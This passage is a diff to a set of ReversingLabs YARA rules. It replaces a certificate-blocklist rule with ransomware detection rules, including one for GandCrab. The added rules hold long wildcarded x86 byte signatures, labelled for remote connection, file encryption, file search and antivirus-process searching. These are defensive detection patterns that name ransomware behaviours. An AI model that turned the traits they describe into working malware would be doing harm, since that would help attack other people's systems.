+            ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? FF 75 ?? 68 ?? ??
+            ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ??
+            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ??
+            85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ??
+            8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0
+            75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50
+            68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74
+            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
+        }
+		$main_routine = {
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8
+            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ??
+            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D
+            ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50
+            E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 89 45
+            ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
+            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ??
+            85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, Tony Yeh" and pe.signatures [ i ] . serial == "08:60:c8:a7:ed:18:c3:f0:30:a3:27:22:fd:2b:22:0c" and 1404172799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $main_routine ) and ( all of ( $search_files_p* ) ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_2Fdadd0740572270203F8138692C4A83 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Gandcrab : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects GandCrab ransomware."
 		author = "ReversingLabs"
-		id = "0b289c4e-c564-5513-a1a5-42e8551c6218"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "a09ed7e6-f3a6-5f44-9d5b-a9c529cf1190"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1600-L1616"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.GandCrab.yara#L1-L892"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "18ce7ed721a454c5bb3cd6ab26df703b1e08b94b8c518055feffa38ad42afa50"
+		logic_hash = "79381635681482fc90defe4e10e97bf16d534837518fc06ae579822e9d77b461"
 		score = 75
-		quality = 90
-		tags = "INFO, FILE"
+		quality = 88
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "GandCrab"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B F9 89 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 85 DB 74 ?? 33 C0
+            83 F8 ?? 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 83 F8 ?? 74 ??
+            57 FF 15 ?? ?? ?? ?? 8D 4D ?? 8D 34 45 ?? ?? ?? ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ??
+            8B D8 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 89 45 ?? FF D6 57 53 FF D6
+            6A ?? 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 8B 35 ?? ?? ?? ?? 53 FF D6 33 FF 8D
+            85 ?? ?? ?? ?? 21 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 83 EC ??
+            FF 75 ?? 53 FF D6 8B 75 ?? 8D 4D ?? 50 53 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 85
+            C0 74 ?? 47 83 7D ?? ?? 74 ?? 8B 4D ?? 8D 55 ?? 83 65 ?? ?? E8 ?? ?? ?? ?? 85 C0 74
+            ?? 8B 45 ?? 85 C0 74 ?? 8B 4D ?? 89 01 EB ?? 33 FF 68 ?? ?? ?? ?? 6A ?? 56 FF 15 ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ??
+            FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
+        }
+		$remote_connection_v2 = {
+            55 8B EC 83 EC ?? 53 56 8B D9 89 55 ?? 57 8D 4D ?? 89 5D ?? E8 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 53 89 45 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 3C 45
+            ?? ?? ?? ?? 8D 47 ?? 50 6A ?? FF D6 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B D8
+            FF D6 89 45 ?? 85 DB 74 ?? 8D 47 ?? 3B F8 73 ?? 8B F3 EB ?? 33 F6 FF 75 ?? 56 FF 15
+            ?? ?? ?? ?? F3 0F 6F 05 ?? ?? ?? ?? 56 F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F
+            7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45
+            ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? FF
+            15 ?? ?? ?? ?? 8D 45 ?? 33 FF 50 FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 68 ?? ?? ?? ?? 83
+            EC ?? 68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 50 56 8B 75 ?? 8D 4D ?? 68 ?? ??
+            ?? ?? 56 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? BF ?? ?? ?? ?? 74 ?? 8B 4D ?? 8D 55
+            ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 85 C0 74 ?? 8B 4D ?? 89
+            01 EB ?? 33 FF 68 ?? ?? ?? ?? 6A ?? 56 8B 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 6A ??
+            FF 75 ?? FF D6 68 ?? ?? ?? ?? 6A ?? 53 FF D6 8B 45 ?? 85 C0 74 ?? 50 FF 15 ?? ?? ??
+            ?? 8B C7 5F 5E 5B 8B E5 5D C3
+        }
+		$crypt_files = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 51 33 C0 89 4C 24 ?? 40 8B DA 50 51 50
+            83 EC ?? 89 5C 24 ?? 50 51 50 51 50 51 50 51 50 83 EC ?? 50 51 50 8D 8C 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 75 ?? 8B
+            F8 03 F3 8D 4E ?? 8D 0C CF C1 E1 ?? 51 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 04 B7 8D 04 C5
+            ?? ?? ?? ?? 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 75 ?? 89 44 24 ?? 8D 0C F5 ?? ?? ?? ??
+            51 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 0C DD ?? ?? ?? ?? 8B F8 51 8D 4C 24 ?? E8 ?? ?? ??
+            ?? 8B D8 89 5C 24 ?? 85 FF 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 57 68 ?? ?? ?? ?? 56 FF
+            75 ?? 8D 0C 36 8B 35 ?? ?? ?? ?? 89 4C 24 ?? FF D6 8B 4C 24 ?? 8D 04 09 89 44 24 ??
+            8D 44 24 ?? 50 53 68 ?? ?? ?? ?? 51 FF 74 24 ?? FF D6 53 8B 1D ?? ?? ?? ?? FF D3 57
+            8B F0 FF D3 83 C0 ?? 8D 4C 24 ?? 03 C6 50 E8 ?? ?? ?? ?? 57 FF D3 40 8D 4C 24 ?? 50
+            E8 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? FF D3 40 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 33 F6
+            89 44 24 ?? 8B CE 57 89 4C 24 ?? FF D3 85 C0 74 ?? 8B 54 24 ?? 89 54 24 ?? 8B 44 24
+            ?? 8A 0C 38 80 F9 ?? 74 ?? 80 F9 ?? 74 ?? 88 0A 42 89 54 24 ?? 40 57 89 44 24 ?? FF
+            D3 8B 4C 24 ?? 8B 54 24 ?? 3B C8 72 ?? 8B 7C 24 ?? 57 FF D3 85 C0 74 ?? 8B 4C 24 ??
+            89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C
+            24 ?? 3B F0 72 ?? 8B 7C 24 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 8B 35 ?? ??
+            ?? ?? 57 FF D6 8D 4C 24 ?? 8D 3C 47 57 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 57 FF
+            D6 FF 74 24 ?? 8D 34 47 FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 57 FF 15 ?? ?? ?? ?? FF 74 24 ?? 8D 34
+            47 FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 57 FF D3 8B 74 24 ?? 8B 1D ?? ?? ?? ?? 56 FF D3 C1 E0 ?? 8D 4C 24 ??
+            83 C0 ?? 50 E8 ?? ?? ?? ?? 56 FF D3 8D 4C 24 ?? 8D 04 C5 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 56 89 44 24 ?? FF D3 8B 5C 24 ?? 8B F0 8B CB 8D 3C 36 8B D7 E8 ?? ?? ?? ?? 8D 44
+            24 ?? 8B CE 8B 74 24 ?? 50 56 68 ?? ?? ?? ?? 57 C1 E1 ?? 53 89 4C 24 ?? FF 15 ?? ??
+            ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 56 FF D3 83 C0 ?? 8D 4C 24 ??
+            50 E8 ?? ?? ?? ?? 56 FF D3 40 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 89 44 24 ?? 33 F6 8B 44
+            24 ?? 8B FE 50 FF D3 85 C0 74 ?? 8B 54 24 ?? 89 54 24 ?? 8B 44 24 ?? 8A 0C 07 80 F9
+            ?? 74 ?? 80 F9 ?? 74 ?? 88 0A 42 89 54 24 ?? 50 47 FF D3 8B 54 24 ?? 3B F8 72 ?? 8B
+            7C 24 ?? 57 FF D3 50 FF 74 24 ?? 6A ?? 57 56 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ??
+            8D 54 24 ?? 89 74 24 ?? 8B CF E8 ?? ?? ?? ?? 59 85 C0 75 ?? 8D 4C 24 ?? E8 ?? ?? ??
+            ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? EB ?? 8B 4C 24 ?? 85 C9 74
+            ?? 8B 45 ?? 89 08 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ??
+            E8 ?? ?? ?? ?? 33 F6 46 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 5F 8B
+            C6 5E 5B 8B E5 5D C3
+        }
+		$crypt_files_v2 = {
+            8B 55 ?? 8B 1D ?? ?? ?? ?? 8D 04 12 89 44 24 ?? 8D 44 24 ?? 50 51 68 ?? ?? ?? ?? 52
+            FF 75 ?? FF D3 8D 04 36 89 44 24 ?? 8D 44 24 ?? 50 57 68 ?? ?? ?? ?? 56 FF 74 24 ??
+            FF D3 8B 1D ?? ?? ?? ?? 57 FF D3 FF 74 24 ?? 8B F0 FF D3 6A ?? 83 C0 ?? 68 ?? ?? ??
+            ?? 03 F0 56 6A ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 89 44 24 ?? C7 44 24 ??
+            ?? ?? ?? ?? FF D3 8B 54 24 ?? 40 85 D2 74 ?? 3B C6 73 ?? 8D 0C 02 89 44 24 ?? 89 4C
+            24 ?? 89 54 24 ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 57 FF D3 40 83 7C 24 ?? ?? 74 ?? 03
+            44 24 ?? 3B C6 72 ?? C7 44 24 ?? ?? ?? ?? ?? FF 74 24 ?? 33 F6 FF D3 85 C0 74 ?? 8B
+            7C 24 ?? EB ?? 8D 9B ?? ?? ?? ?? 8B 4C 24 ?? 8A 04 0E 3C ?? 74 ?? 3C ?? 74 ?? 88 07
+            47 51 46 FF D3 3B F0 72 ?? 8B 7C 24 ?? 57 33 F6 FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C
+            24 ?? 90 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C 24
+            ?? 3B F0 72 ?? 8B 74 24 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D7 56 FF 15 ?? ??
+            ?? ?? 8D 4C 24 ?? 8D 34 46 56 89 74 24 ?? E8 ?? ?? ?? ?? 8D 54 24 ?? C7 44 24 ?? ??
+            ?? ?? ?? 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 50 FF 15 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D7 8B 7C 24 ?? 57 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            56 FF 15 ?? ?? ?? ?? 8B 74 24 ?? 56 FF 74 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+            ?? 57 8B 3D ?? ?? ?? ?? FF D7 68 ?? ?? ?? ?? 6A ?? 56 FF D7 8B 74 24 ?? 68 ?? ?? ??
+            ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 56 FF D7 FF 74 24 ?? 8D 34 46 FF D3 50 56
+            6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 74 24 ?? 68 ?? ?? ?? ??
+            56 FF 15 ?? ?? ?? ?? 56 FF D7 8B 7C 24 ?? 57 8D 34 46 FF D3 50 56 6A ?? 57 6A ?? 68
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24
+            ?? 8B 35 ?? ?? ?? ?? FF D6 8B F8 6A ?? C1 E7 ?? 68 ?? ?? ?? ?? 83 C7 ?? 57 6A ?? FF
+            15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? FF D6 8D 0C C5 ?? ?? ?? ?? 8B 44 24 ?? 85 C0
+            74 ?? 3B CF 73 ?? 8B F8 EB ?? 33 FF FF 74 24 ?? FF D6 8B 0D ?? ?? ?? ?? 89 44 24 ??
+            85 C9 74 ?? 68 ?? ?? ?? ?? 6A ?? 51 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? FF D6 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 8B 4C 24 ?? 8D 34 00
+            8B D6 E8 ?? ?? ?? ?? 8B 4C 24 ?? 8D 04 CD ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 50 57
+            68 ?? ?? ?? ?? 56 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 57 FF
+            D3 6A ?? 68 ?? ?? ?? ?? 8D 70 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 57 89 44 24 ?? FF D3 8D
+            48 ?? 8B 44 24 ?? 85 C0 74 ?? 89 44 24 ?? 3B CE 72 ?? C7 44 24 ?? ?? ?? ?? ?? 57 33
+            F6 FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01
+            41 89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 74 24 ?? 56 FF D3 50 FF 74 24
+            ?? 6A ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 51 8D 54 24 ?? C7 44 24 ??
+            ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 50 8B 44 24 ?? 50 FF D3 8B 44 24 ?? 68 ?? ?? ?? ?? 6A ?? 50 FF D3 68 ?? ?? ?? ??
+            6A ?? FF 74 24 ?? FF D3 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF D3 8D 4C 24 ?? E8 ?? ??
+            ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3
+        }
+		$find_files = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 89 55 ?? 8B F9 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
+            ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 57 8D 1C 47 89 5D ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF
+            15 ?? ?? ?? ?? 8B F0 33 C0 89 75 ?? 66 89 03 83 FE ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 8B 5D ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ??
+            ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? 57 FF 15
+            ?? ?? ?? ?? 8B 55 ?? 8B CF 53 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? FF 75
+            ?? 8B 03 8D 95 ?? ?? ?? ?? 8B 73 ?? 51 8B CF 89 45 ?? E8 ?? ?? ?? ?? 01 03 59 11 53
+            ?? 59 3B 73 ?? 77 ?? 72 ?? 8B 45 ?? 3B 03 73 ?? 8B 45 ?? FF 00 8B 75 ?? 8B 45 ?? 33
+            C9 66 89 08 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 56 FF
+            15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3
+        }
+		$find_files_v2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 89 55 ?? 8B F9 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
+            ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
+            ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8D 1C 47 89 5D ?? FF D6 8D 85 ?? ?? ?? ?? 50
+            57 FF 15 ?? ?? ?? ?? 33 C9 89 45 ?? 66 89 0B 83 F8 ?? 75 ?? B8 ?? ?? ?? ?? 5F 5E 5B
+            8B E5 5D C3 8B 5D ?? EB ?? 8D A4 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57 FF D6 F6 85 ?? ?? ?? ?? ?? 74 ?? 68
+            ?? ?? ?? ?? 57 FF D6 8B 55 ?? 8B CF 53 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? EB
+            ?? FF 75 ?? 8B 03 8D 95 ?? ?? ?? ?? 8B 73 ?? 51 8B CF 89 45 ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 01 03 11 53 ?? 3B 73 ?? 77 ?? 72 ?? 8B 45 ?? 3B 03 73 ?? 8B 45 ?? FF 00 8B 35 ??
+            ?? ?? ?? 8B 45 ?? 33 C9 66 89 08 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B E5 5D C3
+        }
+		$search_antivirus_processes = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 B8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A
+            ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B F8 53 6A ??
+            89 7D ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 89 1E 83 FF ?? 74 ?? 56 57 FF 15 ?? ??
+            ?? ?? 33 DB 8D 7E ?? 57 FF B4 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 76 ??
+            50 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? FF 75 ??
+            FF 15 ?? ?? ?? ?? 43 83 FB ?? 72 ?? 8B 7D ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 85
+            F6 74 ?? 68 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5
+            5D C3
+        }
+		$search_antivirus_processes_v2 = {
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
